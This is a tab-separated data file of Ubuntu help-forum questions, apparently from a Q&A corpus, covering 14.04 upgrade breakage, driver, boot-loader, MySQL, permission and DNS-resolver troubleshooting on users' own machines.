454981	ubuntu 14 , lenovo g510 bluetooth does not turn on	i had installed ubuntu 13.1 now upgraded to 14.04 . bluetooth does n't turn on what so ever . tried sudo rfkill unblock all for soft block but still does n't work . dmesg| grep blue gives this output : [ 25.767948 ] bluetooth : core ver 2.17 [ 25.767972 ] bluetooth : hci device and connection manager initialized [ 25.767982 ] bluetooth : hci socket layer initialized [ 25.767986 ] bluetooth : l2cap socket layer initialized [ 25.767990 ] bluetooth : sco socket layer initialized [ 29.175379 ] bluetooth : error in firmware loading err = -110 , len = 448 , size = 4096 [ 29.175423 ] bluetooth : loading patch file failed [ 36.164928 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 36.164931 ] bluetooth : bnep filters : protocol multicast [ 36.164938 ] bluetooth : bnep socket layer initialized [ 36.170118 ] bluetooth : rfcomm tty layer initialized [ 36.170128 ] bluetooth : rfcomm socket layer initialized [ 36.170133 ] bluetooth : rfcomm ver 1.11
454983	change ubuntu top bar icon	i need to change top bar setting icon to ubuntu logo icon . i searched on following location /usr/share/icons/ubuntu-mono-dark/ /usr/share/unity/themes/ /usr/share/unity/icons/ and i ca n't find that icon . i do n't use any icon set rather than ubuntu defaults , can anyone help me that would be a great favor . please refer this image :
454984	xubuntu 14.04 - confirmation dialog box does n't appear after hitting shift + del shortcut	when i try to permanently delete a file or folder from desktop on xubuntu 14.04 ( using shift + del shortcut ) no confirmation dialog box appears before they 're excluded from computer . it seems to be a xfdesktop issue , since this problem does n't occur on nautilus or thunar .
454985	flickering desktop and unity	i found that my desktop and unity bar were acting up after booting my laptop . i found that i could just manage to escape from the problem of a constantly flickering desktop and unity bar by logging out and logging into 2d with my login ( or logging in as a guest ) . i wonder if i am in the realms of inadequate ram here . in which case , perhaps i should just use the 2d login on a permanent basis . it does seem to thus run somewhat faster , and i 'm not that bothered about the appearance on this older machine ( that was running xp until only a few days ago ) . if i really want a better version of ubuntu , i will probably do it by buying another ( new higher spec ) laptop that has ubuntu preloaded . details tells me ubuntu 12.04 lts is running on an acer aspire 4730z with 932.1 mib . pentium ( r ) dual-core cpu t4200 @ 2.00ghz ă 2 . 32 bit os . graphics unknown . 245 gb , with 120 gb in use on a single partition .
454986	how do i install an older version of a program ?	i need to install an older version of vino to get around this bug how do i do that ? specifically , i have xubuntu 14.04 , freshly installed . vino no longer wants to talk with my phone : ( . 14.04 comes with vino 3.8.1 . previously , i was using 12.04 which had vino 3.4.2 which did work . until they fix this bug , how to get around this ? btw , yes , this is also in ubuntu 's bug tracker : 1290666 .
454988	is it recommanded to install fresh ubuntu ( desktop ) instead of upgrade ?	is upgrade from ubuntu old version to latest ( lts ) version takes long time and risky if power failure or connection fail ? many users facing problem after upgrading ubuntu . so , if upgrade takes long time and besides may be problematic , then is it should be recommended or preferable to avoid upgrade , first backup data and then install fresh ubuntu which does n't take more time and no risk or we can say that right way to establish and use latest ubuntu without any doubt ?
454990	unable to access `` vboxadditions_4.3.10_93012 ''	i installed ubuntu 13.10 in virtual box and everything went well until i upgraded it recently to ubuntu 14.04 . after the upgrade , it is not entering into full screen and if i try to install `` virtual box additions '' inside ubuntu , it is showing unable to access `` vboxadditions_4.3.10_93012 '' as in the screenshot attached , i think vboxadditions got corrupted somehow . please guide me experts .
454994	how can i install a network scanner to ubuntu 14.04 ?	i have a multi-purpose printer ( scanner/fax/printer/copier ) . samsung m267x 287x . i have added it as a printer in ubuntu 14.04 . how can i add it as a scanner to ubuntu ?
454996	it shows 'no pictures/videos ' in my shotwell	i am using ubuntu 13.10 and i have a lot of pictures on my system , but after i open the main shotwell window , it does n't show any picture at all ! i 've attached a screenshot of the window .
454997	i want a open source ( community edition ) document management system on ubuntu which has a web interface	i have installed ubuntu 12.04lts on a pc and have been trying to make it a server for hosting the source code and storing documents of our small company . we have a need to run a document management system for our binary machine drawings and other documents . i liked the gitlab model for source code control that lets me use ubuntu as server and provides a web interface for windows users to work on their projects using clients like source tree etc . i tried all the links that i get when i searched on the web - openkm , docmgr , epiware but none works . is there none that exists and that actually works on ubuntu ( or linux ) ?
454999	install orchis-gtk theme on ubuntu 14.04	i am trying to install the orchis-gtk theme on ubuntu 14.04. http : //mokaproject.com/orchis-gtk-theme/download/ it said 'orchis requires the murrine engine for it 's gtk2 aspects . ' what does that mean ? do i just need to do this from the website or i need to do more ? sudo add-apt-repository ppa : moka/orchis-gtk-theme sudo apt-get update sudo apt-get install orchis-gtk-t
455000	group permissions allow , but still get permission denied	i have a ext4 partition and i 've set the group owner for all subdirectors to mygroup : # chgrp -r mygroup /mount/abc # chmod -r g+swrx /mount/abc my user is part of that group . inside that partition is a folder who is owned by user 'nobody ' and now by the group 'mygroup ' . my user is part of 'mygroup ' . here 's an ls -l : myuser @ host : /mount/abc/folder $ ls -l drwxr-sr-x 2 nobody mygroup 4096 apr 25 12:08 ./ drwxrwsrwx 6 nobody mygroup 4096 apr 24 07:57 ../ -rw-r-xr -- 1 otheruser mygroup 159539 apr 23 23:44 test.png* myuser @ host : /mount/abc/folder $ groups myuser myuser : mygroup { ... a list of other groups also ... } myuser @ host : /mount/abc/folder $ rm test.png rm : remove write-protected regular file ‘test.png’ ? y rm : can not remove ‘test.png’ : permission denied myuser @ host : /mount/abc/folder $ touch test.txt touch : can not touch ‘test.txt’ : permission denied note that i can not delete nor create a file that is owned by a group that my user is a part of . i guess i do n't fully understand how groups work . i thought if you were part of a group then you inherit the permissions of that group . am i doing something wrong ? thanks
455001	ubuntu 14.04 disappeared	i downloaded ubuntu 14.04 64-bit .iso from official ubuntu site . while installing it from a bootable usb drive i selected to replace windows 8 . the installer removed all my partitions and replaced it with an ubuntu one . i then installed windows 8 by making a separate partition out of the ubuntu space . i did not get any option to boot ubuntu . why ca n't i boot ubuntu and how do i fix this ? and is there any way to get back my files ( a whole lot collection of programmes , movies , games and music ?
455002	change the mbr without need to reinstall os	i have windows xp installed on my computer and ubuntu installed alongside windows . mbr is on the windows ntfs partition and i now want to delete the ntfs partition and use ubuntu as my primary os . is it possible to do so ? please advice .
455010	ca n't connect to my wlan router but can connect to any other router ( but router works fine with other distributions )	suddenly after ubuntu freeze i am unable to connect to my router . i have already reset my router but nothing has happend . if i connect my ubuntu with my andriod wlan router it works fine . i have tried lot of things : changed router setting , restarted network- manager , deleted old networks and there is no black list on my router , turned off power management etc . but it still does n't work with my router . on the other hand i m able to connect with my router from other linux distributions like mint from other computers . router also works fine with win7 os . it 's very confusing ! ! i have technicolor router from upc . my wlan0 : ralink technology rt2501/rt2573 . so again it works fine with other router ( andriod mobile ) but not with technicolor . but technicolor works fine with mint , win7 and andriod devices but not only with ubuntu . answer1 : laurent ubuntu 12.04.04 -- - ifconfig wlan0 : link encap : ethernet hwaddr 00:12 : bf : c4:8c : f2 inet6 addr : fe80 : :212 : bfff : fec4:8cf2/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:37 errors:0 dropped:0 overruns:0 frame:0 tx packets:112 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5681 ( 5.6 kb ) tx bytes:26298 ( 26.2 kb ) '' answer comment-1 : parto '' youtube but true : ) with alt+print+b ( r e i s u b ) good point , i think that would be a problem . because right after rebooting i was unable to connect to my router . but i have checked couple of config files & compared thier output on forums . but i must have missed somthing . booted yes , i have rebooted couple of times . still there is same problem . rfkill list output 0 : phy0 : wireless lan soft blocked : no hard blocked : no
455011	can not get grub to boot into win 7	i 've google searched heaps and tried all the options so far , but nothing seems to work . windows 7 does not show up on the grub loader after installing ubuntu 14.04 . i 've tried editing /etc/grub.d/40_custom by adding : menuentry `` windows 7 uefi '' { search -- fs-uuid -- no-floppy -- set=root 5761-0ba2 chainloader ( $ { root } ) /efi/microsoft/boot/bootmgfw.efi } but the grub loader just says : error : file `/efi/microsoft/boot/bootmgfw.efi` not found i ran bootinfoscript and this is my output ( the efi partition appears to be sda6 ) : http : //pastebin.com/4rzxptc4 i 'm at a loss . any help ?
455014	how do i download from my ubuntu-one account now ?	i have my files synced with ubuntu-one . but as the service will be closed , i need to download the files . i installed 14.04 and my previous documents were deleted.in 14.04 , there is no ubuntu-1 app , so i ca n't really do anything . what should i do to download the files . in the site i see only the message i do n't see any option to download , everywhere its the same message the service has been discontinued . no download options . here is a screenshot after i use the files ( https : //one.ubuntu.com/files/ ) link :
455018	pango error in ubuntu 14.04	i ca n't get software-center and other python applications to run in ubuntu 14.04 . the error i get in the terminal is : traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 25 , in < module > from gi.repository import gtk , gobject file `` /usr/lib/python2.7/dist-packages/gi/importer.py '' , line 68 , in load_module dynamic_module._load ( ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 294 , in _load self._introspection_module = get_introspection_module ( self._namespace ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 273 , in get_introspection_module module = introspectionmodule ( namespace , version ) file `` /usr/lib/python2.7/dist-packages/gi/module.py '' , line 122 , in __init__ repository.require ( namespace , version ) gi.repositoryerror : typelib file for namespace 'pango ' , version '1.0 ' not found i get this for a number of other applications . i tried installing pango from source , but that did n't help and then i tried installing the pango-graphite package which screwed up fonts everywhere . does anyone know what is going on and how to revert to the base settings ?
455020	ubuntu 14.04 shutdown from gear icon looks like suspend but does n't wake up	when i select the shutdown option from the gear icon the computer goes through the motions of shutting down but then gets stuck in what appears to be suspend ( power led blinks ) , but the wake from suspend key ( fn f4 ) does n't work . the only way to wake it up is to hold the power button until the power light goes off , then use the power button to boot like normal . same result with sudo shutdown -h now . suspend mode works as expected . my phoenix bios has no `` wake on lan '' feature .
455024	how can i stop my server being an `` open dns resolver '' ?	this morning i got a letter from my isp saying that my ubuntu server ( 13.10 ) can be used as an `` open dns resolver '' . they propose 3 possible solutions to fix this problem : limit access to recursive servers authorisation servers are not allowed to implement recursion the access to your server could be limited by using a firewall so i did some research and found out ( through http : //www.openresolver.jp/en/ ) that my server is indeed vulnerable . the problem however is , that according to my whereabouts , i never installed an dns server on the machine . after reading a bit more , i found out that dnsmasq is installed by default and people suggest securing it , but i ca n't find any config file whatsoever . when i run ps aux | grep dnsmasq , i do get : server 21966 0.0 0.0 8172 952 pts/1 s+ 09:09 0:00 grep -- color=auto dnsmasq also , i have a feeling my openvpn service could have something to do with it . my server is still vulnerable even after i disable my openvpn service . i would be thankful to anyone who has any tip ( s ) or advice on how to make my server safe and shut down or secure the responsible service . if i do n't manage to solve the issue , my isp will disconnect me from the network .
455027	uid/gid mismatch	i have been trying to setup the magento site but have been playing around with permissions which has resulted in the following error in the suexec.log [ 2014-04-25 08:20:56 ] : uid : ( 5015/web12 ) gid : ( 5011/client7 ) cmd : .php-fcgi-starter [ 2014-04-25 08:20:56 ] : target uid/gid ( 5015/5011 ) mismatch with directory ( 33/33 ) or program ( 33/33 any ideas how i can get it so that the uid and gid match ? i have done id www-data and 5011/client7 is against that user . any help would be great .
455029	mysql server start failed	i am running ubuntu server . when i tried to login to mysql ( which was running ) , i got the following error error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock ' ( 2 ) but mysqld.sock file does n't exist inside /var/run/mysqld folder . on executing ps aux | grep mysql command , i realized that mysql server was not running . i then tried to restart mysql server using service mysql start service mysql restart /etc/init.d/mysql start but , the start process failed in all 3 cases . /var/log/mysql/mysql.log and /var/log/mysql/mysql.err files are empty . but /var/log/error.log shows following information : 140425 12:49:05 [ warning ] using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release . please use the full name instead . 140425 12:49:05 [ note ] plugin 'federated ' is disabled . 140425 12:49:05 innodb : the innodb memory heap is disabled 140425 12:49:05 innodb : mutexes and rw_locks use gcc atomic builtins 140425 12:49:05 innodb : compressed tables use zlib 1.2.8 140425 12:49:05 innodb : using linux native aio 140425 12:49:05 innodb : initializing buffer pool , size = 3.0g 140425 12:49:05 innodb : completed initialization of buffer pool innodb : error : log file ./ib_logfile0 is of different size 0 5242880 bytes innodb : than specified in the .cnf file 0 26214400 bytes ! 140425 12:49:05 [ error ] plugin 'innodb ' init function returned error . 140425 12:49:05 [ error ] plugin 'innodb ' registration as a storage engine failed . 140425 12:49:05 [ error ] /usr/sbin/mysqld : unknown variable 'record_buffer=64m' 140425 12:49:05 [ error ] aborting 140425 12:49:05 [ note ] /usr/sbin/mysqld : shutdown complete
455030	ralink rt3290 wifi driver is not working in ubuntu 14.04	i recently upgraded from ubuntu 13.10 to ubuntu 14.04 . wifi ( with ralink rt3290 card ) was not working in ubuntu 13.10 , but after the following the guide here , how do i get a ralink rt3290 wireless card working ? , it worked fine . but in ubuntu 14.04 , no matter how much i try it does not work . can anyone please figure out what the problem is and how to solve it .
455032	delay in the 0 , 4 and 6 keys on the numpad on ubunutu 14.04	after upgrading to ubuntu 14.04 , the 0 , 4 and 6 keys in my numpad suddenly respond only after being pressed for about a second . the rest of the numpad is fine , as well as the 0 , 4 and 6 above the letters . my computer is a laptop ( vaio ) . i checked the slow keys option in the universal settings , that 's not it . update : turns out this problem applies only to my main ( administer ) acount . it does n't happen in the login screen or a guest session .
455033	i deleted ubuntu-desktop when removing abiword ... is it safe to auto remove ?	after removing ubuntu-desktop when i was removing abiword and other default files on lubuntu 14.04 , i am kinda unsure if it is safe to use apt-get autoremove . here are the list of files that are being deleted : the following packages will be removed : brasero-cdrkit brasero-common ca-certificates-java default-jre default-jre-headless dvd+rw-tools fonts-opensymbol fonts-sil-gentium fonts-sil-gentium-basic growisofs icedtea-7-jre-jamvm java-common libatk-wrapper-java libatk-wrapper-java-jni libbonobo2-0 libbonobo2-common libboost-date-time1.54.0 libboost-system1.54.0 libbrasero-media3-1 libcdr-0.0-0 libclucene-contribs1 libclucene-core1 libcmis-0.4-4 libexttextcat-2.0-0 libexttextcat-data libgconf2-4 libgmime-2.6-0 libgnome2-0 libgnome2-bin libgnome2-common libgnomevfs2-0 libgnomevfs2-common libhsqldb1.8.0-java libhyphen0 libidl-common libidl0 liblangtag-common liblangtag1 libmspub-0.0-0 libmythes-1.2-0 liborbit-2-0 liborbit2 liborcus-0.6-0 libreoffice-avmedia-backend-gstreamer libreoffice-base-core libreoffice-base-drivers libreoffice-calc libreoffice-common libreoffice-core libreoffice-gnome libreoffice-gtk libreoffice-java-common libreoffice-math libreoffice-pdfimport libreoffice-sdbc-firebird libreoffice-sdbc-hsqldb libreoffice-style-galaxy libreoffice-style-human libreoffice-writer libservlet3.0-java libtotem-plparser18 libvisio-0.0-0 openjdk-7-jre openjdk-7-jre-headless python3-uno tzdata-java uno-libs3 ure xfonts-mathml 0 upgraded , 0 newly installed , 69 to remove and 5 not upgraded . after this operation , 370 mb disk space will be freed . do you want to continue ? [ y/n ] n abort .
455039	xubuntu 14.04 no login dialog	i am an xubuntu newbie , though years ago i used vax , then solaris etc . i am an old analog circuit engineer , not savvy in computer systems except as a user of engineering apps . the install went well on my old lenovo z61m laptop , and nicely partitioned the disk so i can still use windows xp . however , it gives no login prompt - after grub it goes straight to the desktop with no security whatsoever . i researched to try and fix it , and found advice to change .conf file . however i get `` access denied '' so i ca n't change it . is there a way to easily set it to provide secure startup ? thanks
455042	no tab bash auto-complete for apt in ubuntu 14.04	now ubuntu 14.04 is released and i upgraded my system a few days ago . one major change was the introduction of a new version of apt . fortunately , it is possible to do the most common task by just writing apt and the necessary command e.g . install . unfortunately , there is still one feature missing from the older apt-get : auto-complete . when i type sudo apt and press tab it suggestes all files in my current directory . also , if i type sudo apt install dcon and press tab , nothing happens . doing the same with sudo apt-get install dcon will invoke the suggestions to install different packages beginning with dconf . is there a possibility to enable the auto-complete in apt ?
455043	xubuntu 14.04 - chromium did n't shut down correctly	today i installed the new ( x ) ubuntu release 14.04 and installed my favorite internet browser `` chromium '' via the repositories . however , chromium always complains that : chromium did n't shut down correctly . to reopen the pages you had open , click restore . when i open it , after a reboot , although i am shutting down chromium in the usual way ( x button ) . anybody facing the same problem , and knows how to fix it ?
455050	how can i remove 14.04 logo from wallpaper ?	since upgrading to 14.04 , the `` ubuntu 14.04 lts '' logo from the login screen remains on the wallpaper after logging in . i have confirmed the image itself does not have the logo on it . is this an option ( in which case where can i unset it ) or a bug ?
455051	download/upload speed indicator applet for 14.04	i need a net speed indicator applet for ubuntu 14.04 . in ubuntu 12.04 i installed it as shown in : how to display network upload / download speed on the panel in ubuntu , but this is not working in ubuntu 14.04 .
455054	'flexnet detected ' i ca n't startup my pc	yesterday i had a problem and and ask a question here . with the answer i got i thought i solved the problem but the it was just temporarily solution . after every restart same problem occurs . i installed autodesk maya recently and the problems began . i used boot-repair and it said `` flexnet detected '' it repaired then i successfully booted to windows . i opened maya then restarted the pc and very same thing again . is n't there a permanent solution ? my question yesterday : { solved } ca n't login to windows7 and ubuntu ( dual boot )
455055	how to get slingshot application launcher work with gnome panel	hey guys i am trying to customize my newly installed ubuntu gnome and i want to launch slingshot instead of gnome app menu from gnome panel . thanks for help ! ! ! .
455058	proftpd put : access failed : 552 791230988 : no space left on device ( test.bin )	when i upload a file , say 755m , proftpd report `` no space left on device '' lftp localhost : / > put test.bin put : access failed : 552 791230988 : no space left on device ( test.bin ) but i run /bin/df -h , i can see there still are 414g avaiable . my ftp root directory is on /home/ftproot filesystem type size used avail use % mounted on /dev/sda4 ext4 1.8t 1.3t 414g 75 % /home so i think there are some wrong in proftpd source code . after i review the code , find the root cause . proftpd-dfsg-1.3.5~rc3/modules/mod_xfer.c +2381 2380 } else { 2381 if ( requested_sz > avail_sz ) { 2382 pr_log_debug ( debug5 , `` % s requested % '' pr_lu `` bytes , only % '' pr_lu 2383 `` bytes available on ' % s ' '' , cmd- > argv [ 0 ] , ( pr_off_t ) requested_sz , 2384 ( pr_off_t ) avail_sz , path ) ; 2385 pr_response_add_err ( r_552 , `` % s : % s '' , cmd- > arg , strerror ( enospc ) ) ; 2386 return pr_error ( cmd ) ; 2387 } 2388 } 2389 } in line 2381 , the unit requesed_sz ( 791,230,988 ) is in bytes , but the unit avail_sz ( 435,293,500 ) is in kb see : proftpd-dfsg-1.3.5~rc3/src/fsio.c +4263 4259 /* in order to return a size in kb , as get_fs_size ( ) does , we need 4260 * to divide by 1024 . 4261 */ 4262 *fs_size = ( ( ( off_t ) fs.f_bavail * ( off_t ) fs.f_frsize ) / 1024 ) ; so to fix this bug : if ( requested_sz > avail_sz ) { have to be modify as if ( requested_sz > avail_sz * 1024 ) { but i do n't know how to report bug to proftpd devel team , who can commit it proftpd ?
455059	upgraded to 14.04 , now i ca n't even log in	my ubuntu has been telling me almost 3 weeks now to upgrade to ubuntu 14.04 , so yesterday i finally did it . but now i ca n't even log in . no password asking , no anything.. ca n't get to the terminal , can`t do anything . when i try to login i get only the usual purple background that says ubuntu . then it goes black . a white message box gives me a message that i have to manage by myself and what do i want to do ( see the screenshot below ) . well , i want it to work ! i do n't even know how to get to the terminal or what to write in it .
455064	how to backup all the data of my ubuntu system ?	i am currently using the remastersys to backup my ubuntu system , but at the end it tells me the following error : the compressed filesystem is larger than genisoimage allows for a single file . you must try to reduce the amount of data you are backing up and try again . but , the free space left 2gb after the backup the system . i have no ideas to fix this problem . ( in addition : i have another system windows 7 in my laptop ) partition table : device boot start end blocks id system /dev/sda1 * 63 83891429 41945683+ 7 hpfs/ntfs/exfat /dev/sda2 83891491 625141759 270625134+ f w95 ext 'd ( lba ) /dev/sda5 83891493 264253184 90180846 7 hpfs/ntfs/exfat /dev/sda6 264253248 444614939 90180846 7 hpfs/ntfs/exfat /dev/sda7 444616704 446568447 975872 83 linux /dev/sda8 495398912 612583423 58592256 83 linux /dev/sda9 612585472 625141759 6278144 82 linux swap / solaris /dev/sda10 446570496 495396863 24413184 83 linux
455068	nbc.com fullscreen flash issue	updated to 14.04 . noticed this : visit nbc.com play any streaming content click the button on the lower right to put it into full screen click it again to exit full screen click the button again to put it into full screen screen becomes corrupted ( black/white flashing ) . this only happens on : chrome version 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) adobe flash player - version : 13.0.0.182 location : /usr/lib/pepflashplugin-installer/libpepflashplayer.so this does not happen on firefox 28 with flash 11.2.202.350 installed . how do i fix this ? thanks .
455075	what can be moved safely to tmpfs in 14.04 ?	i installed ubuntu 14.04 on my laptop with ssd and 8gb ram . what can be moved safely to tmpfs ( and how to do it correctly , i 'm mediocre in linux ) ? i do n't know is it important or not , i mounted anything to / ( i did not create separate partitions for home or something like that ) . also , maximum ram usage i saw is about 1.5-2 gb .
455080	installing 8.1 windows | removing ubuntu ?	i'am running ubuntu right now ( 32 bit ) , i burned the windows 8.1 iso ( 64 bit ) on my usb now when i launch my usb on boot , i have language select , then accept terms ... and when i have to choose parititions of where to install windows 8.1 , i get the following error : `` nous n'avons pas pu crăšer de partition , ni localiser une partition '' it 's in french , sry . ( in english : we did not create a partition or locate a partition ) i tried to delete the parition and make new ones same error ( do i have to delete the system partition ? and remake ? ) since i ca n't install over it because it 's not ntfs & no , i'am not planning to dual boot , i just wan na remove ubuntu & put windows gparted :
455086	evolution options in online accounts dialog for google account	i have my google apps account setup in online accounts , mainly for use with empathy . this has been working fine for a while . since updating to 14.04 , some new options for evolution have appeared in the dialog : since i do n't use evolution , i turned all of these off . but after clicking 'grant access ' i get : what features will this enable on my ubuntu desktop , and why am i still prompted for this even after disabling the integration ? if they lead to some thing like new mail notification , or things appearing on the calender , i might turn them on . but if not , i do n't want to give a program i do n't use access to my mail .
455093	how can i backup only certain folders using deja dup ?	i want to backup only my documents folder and not my complete home folder . i tried doing so by including the documents folder in `` folders to save '' while adding all others to `` folders to ignore '' but it still backed up all of my home ! so how do i do backup selective folders ?
455094	too many fats on usb drive ?	a while ago , i wrote an image on a usb drive using something along these lines : dd bs=4m if=/path/to/image.iso of=/dev/sdb & & sync something must have gone terribly wrong there because after using the drive once or twice , ubuntu did n't automount it anymore . so , i decided to overwrite the partition table first , since the image partition table is not a standard table . so i did : dd count=1 bs=512 if=/dev/zero of=/dev/sdb & & sync after that , ubuntu suddenly mounted the drive again and i could actually access the image . this is funny , since i basicaly erased the partition table . so , i tried : cfdisk /dev/sdb however , cfdisk shouted fatal error : can not open disk drive . so , i tried gparted and created a new partition table . now , the drive is automounted but i was suspicious of the whole thing , so i tried fsck.msdos and this is the very unsettling message i got : prompt @ prompt : ~ $ fsck.msdos /dev/sdb dosfck 3.0.12 , 29 oct 2011 , fat32 , lfn , currently , only 1 or 2 fats are supported , not 251 . however , if i check the partition table with fdisk i get no error messages , nothing , just a clean table with one partition : disk /dev/sdb : 4004 mb , 4004511744 bytes 218 heads , 51 sectors/track , 703 cylinders , total 7821312 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00095e47 device boot start end blocks id system /dev/sdb1 2048 7821311 3909632 b w95 fat32 so , the only option i see now is zeroing out the first sector which is how all this started in the first place . i 'm going to try zeroing the complete device and report back with results . do n't hesitate to give me other suggestions though .
455098	qtstalker does n't display axis labels	i have installed qtstalker 0.36 . it has been installed successfully but when i load data and view charts there are no labels on the x or y-axis . has anyone encountered this before and got a solution ? thanks
455099	windows boot loader not letting grub be default loader	i have a hp laptop which i dual booted with windows 8 and linux ubuntu . after the installation , windows started automatically without any grub menu . however if i pressed f9 at the start i got `` boot options '' where ubuntu was specified and i could boot into ubuntu from there . so i searched the forum and found this article which explained how to restore the grub menu . however even after trying following command several times i could n't get the grub menu . bcdedit /set { bootmgr } path \efi\ubuntu\grubx64.efi i even tried using efibootmgr to change boot order but it was no god and i could n't get the grub menu as the order was resetted every time i restarted my computer .
455101	workoflow for regularly updating custom compiled kernels	suppose you want a kernel with additional features such as the grsecurity patches which are not included in the ubuntu standard kernel images . doing this once is not a big deal but when you update it , you have to do the whole compiling process again , which will become anyoing very soon if you want regular updates to the kernel . so what would be a good workflow to update a kernel with custom patches regularly without too much pain ? i guess there are many folks out there which use custom build kernels and already have a good workflow for this .
455104	how to upgrade from apache2.2 to apache 2.4 in ubuntu ?	i have apache2.2 server and i need to upgrade to apache 2.4 version . how can i do it ? thank you .
455108	after updating the system to 14.04 , an application fails due to lack of libpng15 . how do i obtain it ?	after updating my kubuntu to 14.04 , one of applications ( the `` king arthur 's gold '' indie game ) would fail due to lack of libpng15 in the system . the error message is : [ 13:47:13 ] png warning : application was compiled with png.h from libpng-1.5.5 [ 13:47:13 ] png warning : application is running with png.c from libpng-1.2.50 [ 13:47:13 ] png fatal error : incompatible libpng version in application and library [ 13:47:13 ] load png : internal png create read struct failure i 've searched the packages and only found libpng12-0 . i 've also googled for libpng15 and faild to find any ppas or something . i 've also tried to follow this piece of advice : just upgraded to ubuntu 14.04 ( trusty ) . unfortunately it has no libpng15 in standard repositories . i 've found source code of library at here , built it with usual way ( ./configure & & make ) . i did n't want to install it globally so i copied shared library ( in my case it was in < libpng_build_dir > /.libs/libpng15.so ) to kag directory . after that game is runnable with ld_preload=./libpng15.so ./rungame i 've tried that and failed . the program would still claim that it runs with libpng-1.2.50 . libpng15.so is located in the application folder , it weighs 694454 bytes , is owned by current user and has -rwxrwxr-x permissions . upd1 : ldd ./kag | grep png shows : libpng12.so.0 = > /lib/i386-linux-gnu/libpng12.so.0 ( 0xf7122000 )
455110	problem : not a valid jar for hadoop example ?	i have installed hadoop-2.4.0 in my 14.04 lts , i have followed this link , i have done upto start and stop services successfully , but when i tried to execute example , $ /bin/hadoop jar hadoop*examples*.jar wordcount /user/hduser/gutenberg /user/hduser/gutenberg-output and i am getting response as , not a valid jar : /hadoop*examples*.jar edit 1 i have installed java 7 ( i.e jdk 1.7 ) and when i used hadoop-1.0.3 it works fine . problem cause when i try to execute with hadoop-2.4.0 . note from this tutorial my system differ the following , i am using java 7 instead of java 6 . i am using hadoop 2.4.0 instead of hadoop-1.0.3 i am usinh ubuntu 14.04 instead of ubuntu 10.04 . and i can successfully execute hadoop-1.0.3 with java 7 on 14.04 . my question why ca n't i run the same for hadoop-2.4.0 .
455115	problem with dnsmasq	i 'm using hostapd and dnsmasq to turn my server in a wifi access point . the wifi is set up and seems to be working . but when the computer boots there 's a massage saying something like `` interface wlan0 not found '' or `` unknown interface : wlan0 '' . i believe that hostapd has not kicked in at that point . therefore there is no interface like wlan0 yet . is there a possibility to load hostapd before dnsmasq ? thanks in advance , markus
455116	is the c930e webcam- logitech directly compatible with 14.04lts at 1080p , h.264 , & possibly uvc 1.5 ?	i saw this link and was told that chris was doing a full review of trusty tahr to tens of thousands of geeks ... with the c930e logitech webcam . just wondered if anyone knew if it actually worked ? .. and with what programs out of the 'software center ' ? ? if it is n't directly compatible , then what hacks can be done to implement afull hd c930e webcam ?
455118	how do i get appearances back to the normal after installing gnome ?	i installed gnome as an alternative desktop environment on 14.04 . however , since rebooting : the loader graphic when starting and shutting down my machien shows the gnome foot rather than the ubuntu logo my login screen looks slightly different when i log into my ubuntu ( unity ) desktop environment , the window decorations are distinctly different . how do i restore the appearance of my ubuntu ( unity ) loader , login screen and desktop to the default settings ? while it was installing an dialog came up asking me which window manager should be my default . i thought the answer was `` lightdm '' so i picked that . i have since found out that is probably not the cause . based on the answer to how to set a default window manager ? i tried looking at /usr/share/gnome-session/sessions/ubuntu.session but it does n't contain a defaultprovider-windowmanager property . if i run sudo update-alternatives -- config x-window-manager i get : there is only one alternative in link group x-window-manager ( providing /usr/bin/x-window-manager ) : /usr/bin/mutter nothing to configure .
455120	upgrade from 13.10 to 14.04 - blank screen after login	upgraded from 13.10 to 14.04 i get a blank screen after log-in , when i push ctrl-alt-f7 the gnome desktop starts , what can i do to avoid this ?
455121	ubuntu gradients	i have just brought a acer aspire e1 522 4500 . i installed ubuntu 14.04 onto it and unfortunately the gradients everywhere are stuffed up . the background looks like layers and so do videos and images . i have installed ubuntu on many computers , and even worse computers than this are able to render the backgrounds correctly and without issue . any help would be appreciated . kind regards sub_server
455122	can not view default site from local network	not sure what i have done but now when i put in my servers ip address it is no longer loading the default index.html that comes with it . i think i did this when trying to learn how to add multiple sites . i can access my webmin page via the port , but i can not access that and the phpmyadmin , i have checked that the default site is in the sites-enabled , i have also check the file to make sure the default directory is correct . can anybody suggest where i should look and check ?
455124	how do i get switchable graphics to work on my samsung rf711 with intel hd & geforce 540m graphics cards on ubuntu 14.04 lts	i have an samsung rf711 intel core i7 laptop , running ubuntu 14.04 lts 64 bit . this comes with two graphics cards - the intel one ( which runs by default ) and an nvidia geforce gt 540m ( which i have never managed to get working on ubuntu ) . i tried various configurations with bumblebee but all ultimately failed when i tried to use optirun ( i have seen an error like `` unable to allocate software rendering cache '' a few times in the xorg log ) . i had another attempt with nvidia-prime this morning . firstly , i ensured that no bumblebee packages were installed , and i ran sudo apt-get purge nvidia* to remove any installed nvidia packages . i then did sudo dpkg-reconfigure lightdm to ensure lightdm was the default , then sudo apt-get install nvidia-331 which installed the 331 drivers , nvidia-prime , nvidia settings etc . after rebooting , i enter low graphics mode . from here , the only way i 've managed to get back to the desktop is to remove the nvidia packages using sudo apt-get purge nvidia* and reboot . this restores the laptop to how it was initially , of course . here is the output of lspci | grep 3d 01:00.0 3d controller : nvidia corporation gf108m [ geforce gt 540m ] ( rev a1 ) and here is the xorg log ( i had to remove some lines to cut down the characters - i have indicated where with ********removed*********** ) [ 45.605 ] x.org x server 1.15.1 release date : 2014-04-13 [ 45.605 ] x protocol version 11 , revision 0 [ 45.605 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 45.605 ] current operating system : linux ant-rf711 3.13.0-24-generic # 46-ubuntu smp thu apr 10 19:11:08 utc 2014 x86_64 [ 45.605 ] kernel command line : placeholder root=uuid=abdf0144-3ec5-4430-bb8f-d3deca65e960 ro quiet splash [ 45.606 ] build date : 16 april 2014 01:36:29pm [ 45.606 